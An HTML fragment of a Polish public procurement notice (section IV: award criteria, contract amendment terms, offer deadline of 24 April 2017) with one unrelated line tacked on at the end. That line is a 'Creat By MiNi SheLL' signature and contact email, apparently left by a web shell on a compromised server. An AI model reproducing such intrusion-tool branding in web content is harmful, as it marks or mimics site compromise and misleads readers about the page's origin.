                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena ofertowa brutto C</td><td>60</td></tr><tr><td>Doświadczenie wykonawcy D</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br /> 
1. Zamawiający, zgodnie z zapisami art. 145 ustawy Pzp, może w razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, lub dalsze wykonywanie umowy może zagrozić istotnemu interesowi bezpieczeństwa państwa lub bezpieczeństwu publicznemu, Zamawiający może odstąpić od umowy w terminie 30 dni od dnia powzięcia wiadomości o tych okolicznościach.
2. W przypadku, o którym mowa w ust. 1, Wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy.
3. Przewiduje się zmiany umowy polegającej na:
a) zmianie powszechnie obowiązujących przepisów prawa, których uchwalenie lub zmiana nastąpiły po dniu zawarcia niniejszej umowy, a z których treści wynika konieczność lub zasadność wprowadzenia zmian, mających wpływ na realizację umowy,
b) zmianie nazwy, adresu firmy, spowodowane zmianą formy organizacyjno-prawnej, przekształceniem lub połączeniem z inną firmą,
c) zmianie wynagrodzenia Wykonawcy w przypadku zmiany przez ustawodawcę przepisów dotyczących stawki procentowej należnego podatku VAT,<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 24/04/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Oferta wraz z załącznikami musi być sporządzona w języku polskim<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com